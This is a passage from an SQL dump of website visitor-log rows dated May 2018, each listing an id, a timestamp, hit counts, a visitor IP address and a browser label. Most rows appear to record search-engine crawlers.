609,1,1,0,0,'87.250.224.46','other'),(248145,1526857151,1,1,0,0,'216.244.66.237','other'),(248146,1526857670,1,1,0,0,'54.36.148.227','other'),(248147,1526857949,1,1,0,0,'54.36.148.50','other'),(248148,1526858343,1,1,0,0,'54.36.148.235','other'),(248149,1526858385,1,1,0,0,'54.36.148.26','other'),(248150,1526858509,2,2,0,0,'141.8.142.74','other'),(248151,1526858806,1,1,0,0,'54.36.149.56','other'),(248152,1526858820,1,1,0,0,'54.36.148.202','other'),(248153,1526859123,1,1,0,0,'54.36.148.33','other'),(248154,1526859277,1,1,0,0,'54.36.148.180','other'),(248155,1526859549,1,1,0,0,'54.36.148.190','other'),(248156,1526859796,1,1,0,0,'54.36.148.116','other'),(248157,1526860006,1,1,0,0,'54.36.149.48','other'),(248158,1526860195,1,1,0,0,'54.36.149.98','other'),(248159,1526860500,1,1,0,0,'8.29.198.27','other'),(248160,1526860717,1,0,1,0,'66.249.66.155',''),(248161,1526860738,1,1,0,0,'87.250.224.46','other'),(248162,1526861479,1,1,0,0,'54.36.148.41','other'),(248163,1526861870,1,1,0,0,'141.8.142.74','other'),(248164,1526862071,1,1,0,0,'54.36.148.244','other'),(248165,1526863319,1,1,0,0,'54.36.149.21','other'),(248166,1526863481,1,1,0,0,'54.36.149.103','other'),(248167,1526863595,1,1,0,0,'141.8.142.74','other'),(248168,1526863879,1,1,0,0,'54.36.148.236','other'),(248169,1526864241,1,1,0,0,'54.36.149.100','other'),(248170,1526864325,1,1,0,0,'54.36.148.10','other'),(248171,1526864698,1,1,0,0,'54.36.148.242','other'),(248172,1526865066,1,1,0,0,'54.36.148.235','other'),(248173,1526865292,1,1,0,0,'54.36.149.93','other'),(248174,1526865306,1,1,0,0,'54.36.148.25','other'),(248175,1526865328,1,1,0,0,'54.36.149.35','other'),(248176,1526865345,1,1,0,0,'54.36.148.203','other'),(248177,1526865359,1,1,0,0,'54.36.148.157','other'),(248178,1526865383,1,1,0,0,'54.36.149.79','other'),(248179,1526865909,1,0,1,0,'66.249.66.76',''),(248180,1526866044,1,1,0,0,'8.29.198.27','other'),(248181,1526866150,1,1,0,0,'216.244.66.237','other'),(248182,1526866323,1,1,0,0,'54.36.148.137','other'),(248183,1526867818,1,1,0,0,'54.36.148.125','other'),(248184,1526867910,1,1,0,0,'54.36.148.244','other'),(248185,1526868000,1,1,0,0,'178.154.171.88','other'),(248186,1526868004,2,2,0,0,'141.8.142.74','other'),(248187,1526868120,1,1,0,0,'87.250.224.46','other'),(248188,1526868558,1,1,0,0,'207.46.13.146','other'),(248189,1526868583,1,1,0,0,'54.36.149.68','other'),(248190,1526868779,1,1,0,0,'54.36.148.211','other'),(248191,1526869158,1,1,0,0,'54.36.149.102','other'),(248192,1526869268,1,1,0,0,'141.8.142.74','other'),(248193,1526869577,1,1,0,0,'54.36.149.54','other'),(248194,1526869641,3,3,0,0,'46.70.253.201','firefox'),(248195,1526869895,1,1,0,0,'54.36.149.64','other'),(248196,1526870149,1,1,0,0,'62.138.2.243','other'),(248197,1526870265,1,1,0,0,'54.36.148.187','other'),(248198,1526870436,101,101,0,0,'198.204.244.90','other'),(248199,1526870609,1,1,0,0,'54.36.148.174','other'),(248200,1526871339,1,1,0,0,'8.29.198.27','other'),(248202,1526871346,37,37,0,0,'198.204.244.90','other'),(248203,1526871372,1,1,0,0,'54.36.149.60','other'),(248204,1526871413,1,1,0,0,'54.36.148.70','other'),(248205,1526871477,1,1,0,0,'141.8.142.74','other'),(248206,1526871621,1,1,0,0,'54.36.148.147','other'),(248207,1526871842,1,1,0,0,'54.36.148.18','other'),(248208,1526871857,1,1,0,0,'180.76.15.146','other'),(248209,1526872010,1,1,0,0,'54.36.148.108','other'),(248210,1526872224,1,1,0,0,'54.36.148.187','other'),(248211,1526872857,1,1,0,0,'54.36.148.60','other'),(248212,1526873257,1,1,0,0,'54.36.148.207','other'),(248213,1526873315,1,1,0,0,'54.36.148.134','other'),(248214,1526873456,1,1,0,0,'54.36.148.150','other'),(248215,1526873670,1,1,0,0,'54.36.149.70','other'),(248216,1526874346,1,1,0,0,'54.36.148.245','other'),(248217,1526875158,1,1,0,0,'54.36.149.73','other'),(248218,1526875217,1,1,0,0,'54.36.148.53','other'),(248219,1526875316,1,1,0,0,'54.36.149.33','other'),(248220,1526875446,1,1,0,0,'54.36.148.193','other'),(248221,1526875632,1,1,0,0,'95.220.78.153','chrome'),(248222,1526875634,1,1,0,0,'95.28.168.99','firefox'),(248223,1526875938,1,1,0,0,'54.36.148.220','other'),(248224,1526876514,1,1,0,0,'54.36.148.112','other'),(248225,1526876515,1,1,0,0,'180.76.15.154','other'),(248226,1526876747,1,1,0,0,'54.36.148.251','other'),(248227,1526876881,1,1,0,0,'8.29.198.26','other'),(248228,1526877012,1,1,0,0,'178.154.171.88','other'),(248229,1526877773,1,1,0,0,'54.36.148.193','other'),(248230,1526878139,1,1,0,0,'54.36.149.20','other'),(248231,1526878742,1,1,0,0,'54.36.148.79','other'),(248232,1526879247,1,1,0,0,'54.36.148.60','other'),(248233,1526879294,1,1,0,0,'54.36.148.29','other'),(248234,1526879410,1,1,0,0,'54.36.149.28','other'),(248235,1526879455,1,0,1,0,'66.249.66.156',''),(248236,1526879648,1,1,0,0,'54.36.148.102','other'),(248237,1526879845,1,1,0,0,'54.36.149.57','other'),(248238,1526879855,1,1,0,0,'54.36.148.28','other'),(248239,1526879857,2,2,0,0,'141.8.142.74','other'),(248240,1526879909,1,1,0,0,'54.36.148.195','other'),(248241,1526880061,1,1,0,0,'54.36.148.157','other'),(248242,1526880205,1,1,0,0,'142.44.159.96','other'),(248243,1526880646,1,1,0,0,'54.36.148.40','other'),(248244,1526880855,3,3,0,0,'91.196.179.25','chrome'),(248245,1526881214,1,1,0,0,'54.36.149.97','other'),(248246,1526881519,1,1,0,0,'141.8.142.74','other'),(248247,1526881689,1,1,0,0,'54.36.149.59','other'),(248248,1526882110,1,1,0,0,'93.170.97.166','chrome'),(248249,1526882170,1,1,0,0,'54.36.148.19','other'),(248250,1526882172,1,1,0,0,'8.29.198.26','other'),(248251,1526882640,1,0,1,0,'66.249.66.157',''),(248252,1526882726,1,1,0,0,'54.36.149.94','other'),(248253,1526882737,1,1,0,0,'54.36.149.99','other'),(248254,1526882765,1,1,0,0,'54.36.148.179','other'),(248255,1526882805,1,1,0,0,'162.210.196.97','other'),(248256,1526882896,1,1,0,0,'54.36.148.116','other'),(248257,1526882990,1,1,0,0,'178.154.171.88','other'),(248258,1526883103,1,1,0,0,'66.249.66.155','chrome'),(248259,1526883146,2,2,0,0,'95.132.26.100','firefox'),(248260,1526883387,1,1,0,0,'54.36.148.188','other'),(248261,1526883729,1,0,1,0,'66.249.66.157',''),(248262,1526883807,1,1,0,0,'54.36.148.180','other'),(248263,1526883810,1,1,0,0,'91.196.178.89','chrome'),(248264,1526883994,1,1,0,0,'92.113.37.254','chrome'),(248265,1526884383,1,1,0,0,'54.36.148.26','other'),(248266,1526884904,1,1,0,0,'54.36.148.31','other'),(248267,1526884944,1,1,0,0,'193.106.30.99','firefox'),(248268,1526885005,1,1,0,0,'54.36.148.82','other'),(248269,1526885097,2,2,0,0,'91.196.178.169','chrome'),(248270,1526885151,1,1,0,0,'66.249.66.157','chrome'),(248271,1526885362,1,0,1,0,'66.249.66.156',''),(248272,1526885522,1,1,0,0,'91.196.178.102','chrome'),(248273,1526885752,1,1,0,0,'54.36.148.119','other'),(248274,1526885891,1,1,0,0,'91.196.178.161','chrome'),(248275,1526885907,1,1,0,0,'54.36.149.22','other'),(248276,1526886229,2,0,2,0,'66.249.66.155',''),(248277,1526886541,1,1,0,0,'91.196.177.46','chrome'),(248278,1526886749,1,1,0,0,'54.36.148.249','other'),(248279,1526887133,4,4,0,0,'91.196.178.76','chrome'),(248280,1526887312,1,1,0,0,'54.36.148.175','other'),(248281,1526887347,1,1,0,0,'91.196.178.129','firefox'),(248282,1526887515,1,1,0,0,'54.36.149.78','other'),(248283,1526887516,1,1,0,0,'54.36.148.134','other'),(248284,1526887546,2,2,0,0,'77.111.244.57','chrome'),(248285,1526887569,1,1,0,0,'35.226.23.240','other'),(248286,1526887716,1,1,0,0,'8.29.198.25','other'),(248287,1526887720,1,1,0,0,'54.36.149.41','other'),(248288,1526887833,1,1,0,0,'54.36.148.237','other'),(248289,1526888113,1,1,0,0,'54.36.149.95','other'),(248290,1526888140,1,1,0,0,'54.165.59.7','other'),(248291,1526888467,1,1,0,0,'54.36.149.89','other'),(248292,1526888514,1,1,0,0,'54.36.149.73','other'),(248293,1526888709,3,3,0,0,'141.8.142.74','other'),(248294,1526888800,1,1,0,0,'54.36.149.82','other'),(248295,1526888808,1,1,0,0,'37.53.188.36','chrome'),(248296,1526888957,1,1,0,0,'176.98.69.7','chrome'),(248297,1526889120,1,1,0,0,'54.36.149.88','other'),(248298,1526889157,1,1,0,0,'54.36.148.107','other'),(248299,1526889182,2,1,1,0,'66.249.66.157',''),(248300,1526889482,1,0,1,0,'66.249.66.155',''),(248301,1526889486,2,2,0,0,'54.36.148.113','other'),(248302,1526889514,1,1,0,0,'35.226.23.240','other'),(248303,1526889602,1,0,1,0,'66.249.66.76',''),(248304,1526890551,1,0,1,0,'66.249.66.157',''),(248305,1526890686,1,1,0,0,'54.36.148.41','other'),(248306,1526890867,4,4,0,0,'91.196.178.76','chrome'),(248307,1526890920,1,1,0,0,'54.36.148.144','other'),(248308,1526891297,1,1,0,0,'54.36.148.245','other'),(248309,1526891706,1,1,0,0,'54.36.149.52','other'),(248310,1526891899,1,1,0,0,'91.209.11.236','other'),(248311,1526892218,2,2,0,0,'91.196.177.46','chrome'),(248312,1526892492,1,1,0,0,'54.36.149.106','other'),(248313,1526892656,1,0,1,0,'66.249.66.157',''),(248314,1526892795,1,1,0,0,'188.239.66.23','chrome'),(248315,1526892955,5,5,0,0,'78.46.163.224','other'),(248316,1526893002,1,1,0,0,'8.29.198.25','other'),(248317,1526893020,1,0,1,0,'66.249.66.75',''),(248318,1526893231,1,1,0,0,'54.36.148.13','other'),(248319,1526893469,1,1,0,0,'141.8.142.74','other'),(248320,1526893678,1,1,0,0,'54.36.148.55','other'),(248321,1526893896,1,1,0,0,'66.249.66.157','chrome'),(248322,1526894105,1,1,0,0,'54.36.149.45','other'),(248323,1526894214,1,1,0,0,'31.43.31.215','chrome'),(248324,1526894238,1,1,0,0,'54.36.148.64','other'),(248325,1526894241,1,0,1,0,'66.249.66.156',''),(248326,1526894802,1,1,0,0,'54.36.149.31','other'),(248327,1526894806,2,2,0,0,'54.36.148.150','other'),(248328,1526894860,2,2,0,0,'91.196.178.161','chrome'),(248329,1526894874,1,0,1,0,'66.249.66.157',''),(248330,1526894894,1,1,0,0,'92.112.125.243','chrome'),(248331,1526894983,5,5,0,0,'95.216.2.81','other'),(248332,1526895196,1,0,1,0,'66.249.66.155',''),(248333,1526895644,1,1,0,0,'216.244.66.237','other'),(248334,1526895649,1,1,0,0,'54.36.149.48','other'),(248335,1526895695,1,1,0,0,'54.36.149.60','other'),(248336,1526895739,1,1,0,0,'54.36.148.161','other'),(248337,1526896073,1,1,0,0,'54.36.149.38','other'),(248338,1526896230,1,1,0,0,'176.122.98.29','chrome'),(248339,1526896286,3,1,2,0,'66.249.66.157',''),(248340,1526896306,1,0,1,0,'66.249.66.74',''),(248341,1526896337,1,1,0,0,'92.112.125.243','chrome'),(248342,1526896364,2,2,0,0,'91.196.178.76','chrome'),(248343,1526896702,1,1,0,0,'91.196.178.89','chrome'),(248344,1526896714,1,1,0,0,'54.36.148.53','other'),(248345,1526896723,1,1,0,0,'54.36.148.88','other'),(248346,1526896752,1,1,0,0,'54.36.149.40','other'),(248347,1526896996,1,1,0,0,'54.36.148.172','other'),(248348,1526897323,1,1,0,0,'176.122.98.29','chrome'),(248349,1526897333,1,0,1,0,'66.249.66.156',''),(248350,1526897521,1,1,0,0,'54.36.148.245','other'),(248351,1526897522,1,1,0,0,'54.36.148.157','other'),(248352,1526897671,1,1,0,0,'54.36.148.56','other'),(248353,1526897784,4,0,4,0,'66.249.66.155',''),(248354,1526897872,1,1,0,0,'37.55.131.34','opera'),(248355,1526898117,1,1,0,0,'66.249.66.74','chrome'),(248356,1526898123,2,1,1,0,'66.249.66.157',''),(248357,1526898544,1,1,0,0,'216.244.66.237','other'),(248358,1526898549,1,1,0,0,'8.29.198.25','other'),(248359,1526898702,1,1,0,0,'54.36.148.76','other'),(248360,1526898863,1,1,0,0,'54.36.149.76','other'),(248361,1526898960,1,1,0,0,'54.36.148.41','other'),(248362,1526898984,1,1,0,0,'66.249.66.75','chrome'),(248363,1526898999,3,3,0,0,'46.211.106.116','chrome'),(248364,1526899020,1,1,0,0,'54.36.149.50','other'),(248365,1526899079,1,0,1,0,'66.249.66.157',''),(248366,1526899185,1,0,1,0,'66.249.66.74',''),(248367,1526899242,1,1,0,0,'54.36.149.73','other'),(248368,1526899327,2,2,0,0,'66.249.66.157','chrome'),(248369,1526899443,1,1,0,0,'54.36.149.103','other'),(248370,1526899604,1,1,0,0,'54.36.148.88','other'),(248371,1526900062,1,1,0,0,'91.196.178.129','firefox'),(248372,1526900183,2,2,0,0,'178.154.171.88','other'),(248373,1526900689,1,1,0,0,'54.36.148.149','other'),(248374,1526900774,1,1,0,0,'54.36.148.27','other'),(248375,1526900996,1,1,0,0,'66.249.66.156','chrome'),(248376,1526901045,1,1,0,0,'54.36.149.62','other'),(248377,1526901183,1,1,0,0,'54.36.148.218','other'),(248378,1526901257,1,1,0,0,'54.36.149.58','other'),(248379,1526901312,1,1,0,0,'37.54.204.201','chrome'),(248380,1526901508,2,2,0,0,'66.249.66.157','chrome'),(248381,1526901622,1,1,0,0,'91.196.177.15','chrome'),(248382,1526901654,1,1,0,0,'66.249.66.74','chrome'),(248383,1526901698,1,1,0,0,'92.112.125.243','chrome'),(248384,1526901724,1,1,0,0,'91.196.178.76','chrome'),(248385,1526902123,1,1,0,0,'92.113.8.249','chrome'),(248386,1526902198,1,1,0,0,'54.36.148.156','other'),(248387,1526902505,2,1,1,0,'66.249.66.157',''),(248388,1526902579,1,1,0,0,'54.36.148.110','other'),(248389,1526902699,1,1,0,0,'54.36.148.217','other'),(248390,1526902707,1,1,0,0,'54.36.148.182','other'),(248391,1526902760,1,0,1,0,'66.249.66.75',''),(248392,1526902993,1,1,0,0,'216.244.66.237','other'),(248393,1526903044,1,1,0,0,'54.36.148.51','other'),(248394,1526903105,1,1,0,0,'94.153.229.229','opera'),(248395,1526903407,1,1,0,0,'54.36.148.246','other'),(248396,1526903534,1,0,1,0,'66.249.66.156',''),(248397,1526903692,1,1,0,0,'54.36.148.186','other'),(248398,1526903696,1,1,0,0,'54.36.148.27','other'),(248399,1526903846,1,1,0,0,'37.55.172.123','firefox'),(248400,1526903859,1,1,0,0,'8.29.198.26','other'),(248401,1526903918,1,1,0,0,'54.36.149.14','other'),(248402,1526904065,1,0,1,0,'66.249.66.74',''),(248403,1526904100,2,2,0,0,'130.180.220.76','chrome'),(248404,1526904127,1,1,0,0,'193.106.30.99','firefox'),(248405,1526904283,1,1,0,0,'54.36.149.58','other'),(248406,1526904475,2,2,0,0,'193.19.152.14','chrome'),(248407,1526904481,1,1,0,0,'54.36.148.167','other'),(248408,1526904556,1,1,0,0,'54.36.148.173','other'),(248409,1526904616,1,1,0,0,'54.36.148.95','other'),(248410,1526904835,1,1,0,0,'54.36.148.85','other'),(248411,1526904891,1,1,0,0,'54.36.148.158','other'),(248412,1526904952,1,1,0,0,'54.36.148.129','other'),(248413,1526904999,1,1,0,0,'141.8.142.74','other'),(248414,1526905080,1,1,0,0,'54.36.148.234','other'),(248415,1526905176,1,1,0,0,'54.36.148.29','other'),(248416,1526905231,1,1,0,0,'54.36.148.33','other'),(248417,1526905265,1,1,0,0,'54.36.148.150','other'),(248418,1526905325,1,1,0,0,'77.52.200.10','chrome'),(248419,1526905337,1,0,1,0,'66.249.66.157',''),(248420,1526905370,1,1,0,0,'54.36.148.190','other'),(248421,1526905621,1,1,0,0,'54.36.148.167','other'),(248422,1526905736,1,1,0,0,'207.46.13.60','other'),(248423,1526905819,1,1,0,0,'54.36.148.198','other'),(248424,1526905823,1,1,0,0,'178.154.171.88','other'),(248425,1526906003,1,1,0,0,'54.36.149.11','other'),(248426,1526906089,2,2,0,0,'91.196.177.46','chrome'),(248427,1526906501,1,0,1,0,'66.249.66.76',''),(248428,1526906634,1,0,1,0,'66.249.66.156',''),(248429,1526906989,1,1,0,0,'54.36.148.206','other'),(248430,1526906995,1,1,0,0,'54.36.148.176','other'),(248431,1526907320,1,1,0,0,'54.36.148.198','other'),(248432,1526907389,1,1,0,0,'54.36.148.158','other'),(248433,1526907390,1,1,0,0,'217.76.207.110','firefox'),(248434,1526907569,1,1,0,0,'178.154.171.88','other'),(248435,1526907611,1,1,0,0,'54.36.148.209','other'),(248436,1526907618,1,1,0,0,'141.8.142.74','other'),(248437,1526907650,1,1,0,0,'66.249.66.155','chrome'),(248438,1526907689,1,1,0,0,'54.36.149.85','other'),(248439,1526907795,1,1,0,0,'54.36.149.42','other'),(248440,1526907834,1,1,0,0,'91.196.177.46','chrome'),(248441,1526907912,1,0,1,0,'66.249.66.156',''),(248442,1526907947,1,1,0,0,'37.55.172.123','firefox'),(248443,1526907963,1,0,1,0,'66.249.66.74',''),(248444,1526908470,1,1,0,0,'91.196.178.45','other'),(248445,1526908790,1,1,0,0,'207.46.13.130','other'),(248446,1526909271,1,0,1,0,'66.249.66.155',''),(248447,1526909381,1,1,0,0,'8.29.198.27','other'),(248448,1526909478,1,1,0,0,'54.36.148.92','other'),(248449,1526909768,1,1,0,0,'66.249.66.156','chrome'),(248450,1526909828,1,1,0,0,'54.36.148.13','other'),(248451,1526910440,1,1,0,0,'77.111.244.8','chrome'),(248452,1526910560,2,2,0,0,'178.154.171.88','other'),(248453,1526910713,1,1,0,0,'217.76.207.110','firefox'),(248454,1526910884,1,1,0,0,'141.8.132.19','other'),(248455,1526911061,1,1,0,0,'54.36.149.38','other'),(248456,1526911183,1,1,0,0,'82.207.26.7','chrome'),(248457,1526911291,1,1,0,0,'54.36.148.253','other'),(248458,1526911352,1,1,0,0,'54.36.148.234','other'),(248459,1526911565,1,1,0,0,'178.255.215.94','other'),(248460,1526911773,1,1,0,0,'91.196.178.89','firefox'),(248461,1526911842,1,1,0,0,'54.36.148.107','other'),(248462,1526911880,1,1,0,0,'54.36.149.20','other'),(248463,1526911899,1,1,0,0,'54.36.148.117','other'),(248464,1526911954,1,0,1,0,'66.249.66.157',''),(248465,1526912190,1,1,0,0,'54.36.149.23','other'),(248466,1526912244,1,1,0,0,'54.36.148.249','other'),(248467,1526912437,1,1,0,0,'54.36.149.104','other'),(248468,1526912538,1,1,0,0,'54.36.148.190','other'),(248469,1526912615,1,1,0,0,'54.36.148.116','other'),(248470,1526912727,1,0,1,0,'66.249.66.155',''),(248471,1526912815,1,1,0,0,'54.36.148.85','other'),(248472,1526912869,1,1,0,0,'5.45.207.83','other'),(248473,1526912894,1,1,0,0,'54.36.149.22','other'),(248474,1526912947,1,1,0,0,'93.75.19.41','firefox'),(248475,1526912980,1,1,0,0,'54.36.148.38','other'),(248476,1526913575,1,1,0,0,'66.249.66.157','chrome'),(248477,1526914148,1,1,0,0,'5.45.207.58','other'),(248478,1526914150,1,1,0,0,'178.154.171.4','other'),(248479,1526914217,1,1,0,0,'107.167.106.84','other'),(248480,1526914338,1,1,0,0,'66.249.66.156','chrome'),(248481,1526914489,1,1,0,0,'54.36.148.171','other'),(248482,1526914521,1,1,0,0,'87.250.224.46','other'),(248483,1526914538,1,1,0,0,'54.36.148.17','other'),(248484,1526914649,1,1,0,0,'54.36.148.33','other'),(248485,1526914708,1,1,0,0,'8.29.198.27','other'),(248486,1526915109,1,1,0,0,'141.8.142.74','other'),(248487,1526915204,1,1,0,0,'54.36.148.56','other'),(248488,1526915356,1,1,0,0,'188.230.43.254','other'),(248489,1526915404,1,1,0,0,'54.36.148.91','other'),(248490,1526915533,1,1,0,0,'178.154.171.88','other'),(248491,1526915534,1,1,0,0,'54.36.149.105','other'),(248492,1526915708,1,1,0,0,'54.36.148.209','other'),(248493,1526915741,1,1,0,0,'54.36.148.117','other'),(248494,1526915777,1,1,0,0,'180.76.15.154','other'),(248495,1526916020,1,1,0,0,'54.36.149.57','other'),(248496,1526916242,1,1,0,0,'54.36.148.125','other'),(248497,1526916556,1,1,0,0,'54.36.148.189','other'),(248498,1526917177,1,1,0,0,'66.249.66.156','chrome'),(248499,1526917204,2,1,1,0,'66.249.66.155',''),(248500,1526917228,1,1,0,0,'54.36.148.117','other'),(248501,1526917398,1,1,0,0,'54.36.149.69','other'),(248502,1526917455,1,1,0,0,'54.36.148.32','other'),(248503,1526917852,2,2,0,0,'66.249.66.157','chrome'),(248504,1526918350,1,1,0,0,'188.230.43.254','other'),(248505,1526918352,1,1,0,0,'91.196.178.93','firefox'),(248506,1526918437,1,1,0,0,'141.8.142.74','other'),(248507,1526918901,1,1,0,0,'47.96.234.252','other'),(248508,1526919016,1,0,1,0,'66.249.66.156',''),(248509,1526919354,1,1,0,0,'54.36.148.178','other'),(248510,1526919412,1,1,0,0,'54.36.149.70','other'),(248511,1526920220,1,1,0,0,'8.29.198.26','other'),(248512,1526920525,1,1,0,0,'54.165.59.7','other'),(248513,1526920759,1,1,0,0,'188.230.43.254','other'),(248514,1526920958,1,1,0,0,'54.36.148.115','other'),(248515,1526920964,1,1,0,0,'141.8.142.74','other'),(248516,1526921244,1,1,0,0,'54.36.148.34','other'),(248517,1526921963,1,1,0,0,'54.36.149.72','other'),(248518,1526921987,1,1,0,0,'141.8.142.74','other'),(248519,1526921995,1,1,0,0,'141.8.132.19','other'),(248520,1526922031,1,1,0,0,'54.36.149.29','other'),(248521,1526922132,1,1,0,0,'54.36.149.56','other'),(248522,1526922242,1,1,0,0,'217.69.133.194','other'),(248523,1526922524,1,1,0,0,'54.36.148.136','other'),(248524,1526922622,1,1,0,0,'54.36.149.92','other'),(248525,1526922769,1,1,0,0,'217.69.133.2','other'),(248526,1526923168,1,1,0,0,'54.36.149.102','other'),(248527,1526923204,1,1,0,0,'188.230.43.254','other'),(248528,1526923309,1,1,0,0,'54.36.148.93','other'),(248529,1526923442,1,1,0,0,'193.106.30.99','firefox'),(248530,1526923655,1,1,0,0,'141.8.142.74','other'),(248531,1526923873,1,1,0,0,'66.249.66.156','chrome'),(248532,1526923899,2,2,0,0,'216.244.66.237','other'),(248533,1526923930,1,1,0,0,'54.36.148.248','other'),(248534,1526924054,1,1,0,0,'217.69.133.3','other'),(248535,1526924181,1,1,0,0,'66.249.66.155','chrome'),(248536,1526924205,1,1,0,0,'54.36.148.187','other'),(248537,1526925324,2,2,0,0,'173.249.13.106','other'),(248538,1526925544,1,1,0,0,'178.154.171.88','other'),(248539,1526925549,1,1,0,0,'8.29.198.26','other'),(248540,1526925602,1,1,0,0,'188.230.43.254','other'),(248541,1526925613,1,1,0,0,'54.36.148.95','other'),(248542,1526925781,1,1,0,0,'91.196.178.70','firefox'),(248543,1526925990,1,1,0,0,'54.36.148.175','other'),(248544,1526925991,1,0,1,0,'66.249.66.157',''),(248545,1526926130,1,1,0,0,'54.36.149.79','other'),(248546,1526926205,1,1,0,0,'54.36.149.64','other'),(248547,1526926225,1,1,0,0,'54.36.148.133','other'),(248548,1526926456,1,1,0,0,'141.8.142.74','other'),(248549,1526926861,1,1,0,0,'54.36.149.18','other'),(248550,1526928669,2,2,0,0,'46.201.112.213','chrome'),(248551,1526928986,1,1,0,0,'217.69.133.2','other'),(248552,1526929228,2,2,0,0,'91.196.178.161','chrome'),(248553,1526930490,1,1,0,0,'141.8.142.74','other'),(248554,1526930870,1,1,0,0,'216.244.66.237','other'),(248555,1526930988,1,1,0,0,'66.249.66.156','chrome'),(248556,1526931045,1,1,0,0,'8.29.198.25','other'),(248557,1526931236,1,1,0,0,'54.36.148.244','other'),(248558,1526931546,1,1,0,0,'180.76.15.18','other'),(248559,1526932083,1,1,0,0,'54.36.148.71','other'),(248560,1526932106,1,1,0,0,'54.36.148.207','other'),(248561,1526932112,1,1,0,0,'54.36.148.137','other'),(248562,1526932153,1,1,0,0,'54.165.59.7','other'),(248563,1526932227,1,1,0,0,'54.36.148.39','other'),(248564,1526932445,1,1,0,0,'54.36.149.36','other'),(248565,1526932655,1,1,0,0,'37.9.113.115','other'),(248566,1526932872,1,1,0,0,'54.36.148.25','other'),(248567,1526933046,1,1,0,0,'54.36.148.126','other'),(248568,1526933437,1,1,0,0,'217.69.133.3','other'),(248569,1526933495,1,1,0,0,'216.244.66.237','other'),(248570,1526933579,1,1,0,0,'54.36.148.165','other'),(248571,1526933642,1,1,0,0,'141.8.142.74','other'),(248572,1526933762,1,1,0,0,'217.69.133.194','other'),(248573,1526933875,1,1,0,0,'54.36.148.174','other'),(248574,1526934014,1,1,0,0,'54.36.149.63','other'),(248575,1526934130,2,0,2,0,'66.249.66.156',''),(248576,1526934690,1,1,0,0,'178.154.171.88','other'),(248577,1526935027,1,1,0,0,'217.69.133.2','other'),(248578,1526935407,1,1,0,0,'217.69.133.9','other'),(248579,1526935559,1,1,0,0,'54.36.149.78','other'),(248580,1526935705,1,1,0,0,'54.36.149.69','other'),(248581,1526936161,1,1,0,0,'54.36.148.83','other'),(248582,1526936387,1,1,0,0,'8.29.198.25','other'),(248583,1526937049,1,1,0,0,'54.36.148.199','other'),(248584,1526937055,1,1,0,0,'54.36.149.78','other'),(248585,1526937653,1,0,1,0,'66.249.66.157',''),(248586,1526938783,1,0,1,0,'66.249.66.157',''),(248587,1526938823,1,0,1,0,'66.249.66.155',''),(248588,1526938856,1,1,0,0,'54.36.148.157','other'),(248589,1526938936,1,1,0,0,'54.36.149.36','other'),(248590,1526939199,1,0,1,0,'66.249.66.75',''),(248591,1526939293,1,1,0,0,'217.69.133.2','other'),(248592,1526939342,1,1,0,0,'217.69.133.9','other'),(248593,1526939387,1,1,0,0,'141.8.142.74','other'),(248594,1526940174,1,1,0,0,'54.36.148.61','other'),(248595,1526940777,1,0,1,0,'66.249.66.155',''),(248596,1526941484,1,1,0,0,'54.36.149.7','other'),(248597,1526941675,1,1,0,0,'54.36.148.109','other'),(248598,1526941704,2,2,0,0,'216.244.66.237','other'),(248599,1526941750,1,1,0,0,'46.161.9.39','chrome'),(248600,1526941869,1,1,0,0,'8.29.198.25','other'),(248601,1526941927,1,1,0,0,'54.36.148.211','other'),(248602,1526942225,2,2,0,0,'178.154.171.88','other'),(248603,1526942240,1,1,0,0,'66.249.66.74','chrome'),(248604,1526942875,1,1,0,0,'54.36.149.101','other'),(248605,1526943022,1,1,0,0,'141.8.142.167','other'),(248606,1526943114,1,1,0,0,'141.8.142.74','other'),(248607,1526943211,1,0,1,0,'66.249.66.156',''),(248608,1526943768,1,1,0,0,'193.106.30.99','firefox'),(248609,1526943824,1,1,0,0,'54.36.148.189','other'),(248610,1526944061,1,1,0,0,'54.36.148.139','other'),(248611,1526944139,1,1,0,0,'54.36.148.155','other'),(248612,1526944140,1,1,0,0,'54.36.148.48','other'),(248613,1526944225,1,1,0,0,'54.36.148.227','other'),(248614,1526944903,2,2,0,0,'66.249.66.155','chrome'),(248615,1526945646,1,1,0,0,'54.36.148.56','other'),(248616,1526945738,2,1,1,0,'66.249.66.156',''),(248617,1526945741,1,1,0,0,'54.36.148.160','other'),(248618,1526945742,1,1,0,0,'54.36.148.185','other'),(248619,1526945842,1,1,0,0,'54.36.149.2','other'),(248620,1526945856,1,1,0,0,'180.76.15.148','other'),(248621,1526946352,1,1,0,0,'216.244.66.237','other'),(248622,1526946518,1,1,0,0,'54.36.148.16','other'),(248623,1526946802,1,0,1,0,'66.249.66.155',''),(248624,1526946997,1,1,0,0,'54.165.59.7','other'),(248625,1526947064,1,1,0,0,'54.36.148.92','other'),(248626,1526947213,1,1,0,0,'8.29.198.25','other'),(248627,1526947281,1,1,0,0,'141.8.142.74','other'),(248628,1526947377,1,1,0,0,'37.9.113.115','other'),(248629,1526947623,1,1,0,0,'54.36.149.44','other'),(248630,1526947653,1,1,0,0,'54.36.149.102','other'),(248631,1526947856,1,1,0,0,'54.36.148.122','other'),(248632,1526947985,1,1,0,0,'178.154.171.88','other'),(248633,1526948336,1,1,0,0,'54.36.148.58','other'),(248634,1526948565,1,1,0,0,'54.36.148.236','other'),(248635,1526948951,23,23,0,0,'158.69.252.151','other'),(248636,1526948971,1,1,0,0,'54.36.149.5','other'),(248637,1526948997,1,1,0,0,'87.250.224.46','other'),(248638,1526949185,1,1,0,0,'54.36.148.76','other'),(248639,1526949276,1,0,1,0,'66.249.66.157',''),(248640,1526949362,1,1,0,0,'54.36.148.34','other'),(248641,1526949563,1,1,0,0,'54.36.148.90','other'),(248642,1526949708,1,1,0,0,'54.36.149.28','other'),(248643,1526949733,1,1,0,0,'54.36.149.30','other'),(248644,1526949760,1,1,0,0,'54.36.148.159','other'),(248645,1526950678,1,1,0,0,'54.36.149.102','other'),(248646,1526951609,1,0,1,0,'66.249.66.156',''),(248647,1526951617,1,1,0,0,'141.8.142.74','other'),(248648,1526951630,1,1,0,0,'54.36.148.86','other'),(248649,1526951842,1,0,1,0,'66.249.66.157',''),(248650,1526952105,1,1,0,0,'66.249.66.156','chrome'),(248651,1526952170,1,1,0,0,'54.36.148.167','other'),(248652,1526952594,1,1,0,0,'54.36.148.153','other'),(248653,1526952706,1,1,0,0,'8.29.198.26','other'),(248654,1526953277,1,1,0,0,'207.46.13.60','other'),(248655,1526953388,1,1,0,0,'66.249.66.156','chrome'),(248656,1526953410,1,1,0,0,'178.154.171.88','other'),(248657,1526953970,1,1,0,0,'54.36.148.105','other'),(248658,1526954026,1,1,0,0,'54.